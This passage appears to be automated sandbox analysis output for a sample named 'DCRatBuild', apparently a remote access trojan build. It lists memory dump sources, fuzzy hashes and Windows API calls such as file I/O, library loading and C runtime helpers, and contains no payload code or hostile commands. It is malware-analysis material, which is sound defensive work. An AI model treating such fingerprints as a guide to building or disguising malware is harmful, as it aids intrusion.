                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: EnvironmentVariable
                      • String ID: sfxcmd$sfxpar
                      • API String ID: 1431749950-3493335439
                      • Opcode ID: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                      • Instruction ID: 6be81edb2da2bd0adcc86ba0cb0132e21e29ad09cd58c478fbcefb8841b13282
                      • Opcode Fuzzy Hash: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                      • Instruction Fuzzy Hash: 7AF0A771801728A7CB212FD4AC0AABA7769EF09741B044562FC8CA6252E661CD41D7F5
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00D6985E
                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D69876
                      • GetLastError.KERNEL32 ref: 00D698A8
                      • GetLastError.KERNEL32 ref: 00D698C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLast$FileHandleRead
                      • String ID:
                      • API String ID: 2244327787-0
                      • Opcode ID: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                      • Instruction ID: 263790307c04b6f6f5ace4e8d251986082cbaf7095d447ed8906b98d66307d76
                      • Opcode Fuzzy Hash: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                      • Instruction Fuzzy Hash: FD117C30900204EBDB209F51C824A79B7ACEB06771F14862AF86AC7690D735DE489F71
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D6CFE0,00000000,00000000,?,00D8A49B,00D6CFE0,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue), ref: 00D8A526
                      • GetLastError.KERNEL32(?,00D8A49B,00D6CFE0,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000,00000364,?,00D89077), ref: 00D8A532
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8A49B,00D6CFE0,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000), ref: 00D8A540
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                      • Instruction ID: fd72f8855906b274747b9be08f6249ce49ef17ff3ef7b2a733773c4c5f8bca52
                      • Opcode Fuzzy Hash: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                      • Instruction Fuzzy Hash: FB01F736611323ABD7219A6C9C44E567B58AF45BA17140563F90AD3240D731DD40C7F1
                      APIs
                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00D6CC94,00000001,?,?,?,00000000,00D74ECD,?,?,?), ref: 00D69F4C
                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00D74ECD,?,?,?,?,?,00D74972,?), ref: 00D69F8E
                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00D6CC94,00000001,?,?), ref: 00D69FB8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileWrite$Handle
                      • String ID:
                      • API String ID: 4209713984-0
                      • Opcode ID: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                      • Instruction ID: 12af2403f7002c85b895a180580d12a5de5ef5a30ba585761da6cc78523c641f
                      • Opcode Fuzzy Hash: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                      • Instruction Fuzzy Hash: 5331E2712083059BDF208F28D858B6AFBA8EF91710F084559F885EB285C775DD49CBB2
                      APIs
                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A22E
                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A261
                      • GetLastError.KERNEL32(?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A27E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CreateDirectory$ErrorLast
                      • String ID:
                      • API String ID: 2485089472-0
                      • Opcode ID: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                      • Instruction ID: 0dc2b45a7e1c8ba7e4dbbc58a7079684b7982b911762bbac5a1e691b3a1100a4
                      • Opcode Fuzzy Hash: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                      • Instruction Fuzzy Hash: 320180311C121467DB229BAD4C55BE97348AF1F781F085452F885F9051DB66CA818EBB
                      APIs
                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D8B019
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Info
                      • String ID:
                      • API String ID: 1807457897-3916222277
                      • Opcode ID: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                      • Instruction ID: efc2a2577bc85becf809975fb62375f38ac332557f072bb3d8718d53a17d3306
                      • Opcode Fuzzy Hash: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                      • Instruction Fuzzy Hash: D84108B050434C9EDF219E68CC95BF7BBA9DB46714F1804EEE59A87142D3359A45CF30
                      APIs
                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00D8A79D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: String
                      • String ID: LCMapStringEx
                      • API String ID: 2568140703-3893581201
                      • Opcode ID: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                      • Instruction ID: 39b0965649d4ae003e3623ff35d79058c3efd3bea4244900fedbc0c9343a976a
                      • Opcode Fuzzy Hash: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                      • Instruction Fuzzy Hash: 4001D332544209BBDF02AFA4DC05DAE3F66EF08750F054156FE2866160CA729931BBA1
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D89D2F), ref: 00D8A715
                      Strings
                      • InitializeCriticalSectionEx, xrefs: 00D8A6E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CountCriticalInitializeSectionSpin
                      • String ID: InitializeCriticalSectionEx
                      • API String ID: 2593887523-3084827643
                      • Opcode ID: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                      • Instruction ID: fb5affb736b094afc0e764d52aebb80430226f79c784799533120b474e5418fb
                      • Opcode Fuzzy Hash: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                      • Instruction Fuzzy Hash: 1CF0E23164531CBBCF016F68DC06CAE7F61EF08720B008166FC196A260DA728E20FBB1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Alloc
                      • String ID: FlsAlloc
                      • API String ID: 2773662609-671089009
                      • Opcode ID: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                      • Instruction ID: cd75ad416ae9b36668252b269a8ddc1395b80164c5a0ea9486cc38c82e02e7a7
                      • Opcode Fuzzy Hash: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                      • Instruction Fuzzy Hash: EBE05530B453287F9B11BB689C028AEBB60CB15B10B410297FC08A7350DE704E0093FA
                      APIs
                      • try_get_function.LIBVCRUNTIME ref: 00D832AF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: try_get_function
                      • String ID: FlsAlloc
                      • API String ID: 2742660187-671089009
                      • Opcode ID: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                      • Instruction ID: 4b57b82537357f625dc38da5393c918a9f422d09aa7eea72e07c94c038c15566
                      • Opcode Fuzzy Hash: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                      • Instruction Fuzzy Hash: 5ED02B227807347E9A1232C47C03AAEBE04C701FB5F4501F2FF0C6A246D571450003F9
                      APIs
                        • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3C4
                      • GetCPInfo.KERNEL32(00000000,00D8B1EA,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CodeInfoPageValid
                      • String ID:
                      • API String ID: 546120528-0
                      • Opcode ID: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                      • Instruction ID: 93df9ef9859eb180947479eaa9d62d7768974ca1359edae9341dde9e4f003674
                      • Opcode Fuzzy Hash: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                      • Instruction Fuzzy Hash: CE5136B09002059EEB24EF79C8826BABBE5EF45328F1C846FD0968B253D735D545CBB1
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                        • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                      • new.LIBCMT ref: 00D613FE
                        • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                      • Instruction ID: c1342899961c7bd4e09fab39fc49d5f2f82406f3728b05d696ae779e5fd3b030
                      • Opcode Fuzzy Hash: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                      • Instruction Fuzzy Hash: D84134B0805B409EE724DF7984869E7FBE5FF18300F444A2ED2EE83282DB326554CB21
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                        • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                      • new.LIBCMT ref: 00D613FE
                        • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                      • Instruction ID: 75f108c865cd7f4d94f761f4a1c1ce60d352bbe0988bc7326e6b218776dc0a91
                      • Opcode Fuzzy Hash: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                      • Instruction Fuzzy Hash: 8E4134B0805B409EE724DF798486AE7FBE5FF19300F544A6ED1EE83282DB326554CB25
                      APIs
                        • Part of subcall function 00D88FA5: GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                        • Part of subcall function 00D88FA5: _free.LIBCMT ref: 00D88FDC
                        • Part of subcall function 00D88FA5: SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                        • Part of subcall function 00D88FA5: _abort.LIBCMT ref: 00D89023
                        • Part of subcall function 00D8B2AE: _abort.LIBCMT ref: 00D8B2E0
                        • Part of subcall function 00D8B2AE: _free.LIBCMT ref: 00D8B314
                        • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                      • _free.LIBCMT ref: 00D8B200
                      • _free.LIBCMT ref: 00D8B236
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorLast_abort
                      • String ID:
                      • API String ID: 2991157371-0
                      • Opcode ID: f88380b0a2278422ea71e419e1c3447cd91add3d8595cab02d536a85c9eedcfe
                      • Instruction ID: eb8274baf031fef27c6ea218b843fee55ba156b157420d33ab2c11a805517829
                      • Opcode Fuzzy Hash: f88380b0a2278422ea71e419e1c3447cd91add3d8595cab02d536a85c9eedcfe
                      • Instruction Fuzzy Hash: CD31C231904208AFDB10FFA9D845BADBBE5EF45330F29409AE4149B3A1EB719D41DB70
                      APIs
                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D69EDC,?,?,00D67867), ref: 00D697A6
                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D69EDC,?,?,00D67867), ref: 00D697DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                      • Instruction ID: c270149ab848a54d8d635c528b46efbaf9091fcb1645db139741c83847fa418b
                      • Opcode Fuzzy Hash: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                      • Instruction Fuzzy Hash: EE21F3B1110748AFE7308F64C885BA7B7ECEB49764F04492EF5E582192C375AC899B71
                      APIs
                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D67547,?,?,?,?), ref: 00D69D7C
                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D69E2C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$BuffersFlushTime
                      • String ID:
                      • API String ID: 1392018926-0
                      • Opcode ID: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                      • Instruction ID: 3bb9e2e7ade0f14867d27571be5b7673ffc563d9aa0a7102dfc483fefd7b65d9
                      • Opcode Fuzzy Hash: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                      • Instruction Fuzzy Hash: EE21D671148246ABC714DE24C461AABFBE8AF55708F08482DB4C5C7181D339DA0DDFB1
                      APIs
                      • GetProcAddress.KERNEL32(00000000,00D93958), ref: 00D8A4B8
                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D8A4C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressProc__crt_fast_encode_pointer
                      • String ID:
                      • API String ID: 2279764990-0
                      • Opcode ID: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                      • Instruction ID: cb861ded359b7653f6b03ce41c908e46e18cae87c30c237ac8b20b37d0e41faa
                      • Opcode Fuzzy Hash: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                      • Instruction Fuzzy Hash: 16110633A112219BBF22EE2CEC4486A7395DB8472471A4622FD1DEB354EA70DC41C7F2
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00D69B35,?,?,00000000,?,?,00D68D9C,?), ref: 00D69BC0
                      • GetLastError.KERNEL32 ref: 00D69BCD
                      Memory Dump Source
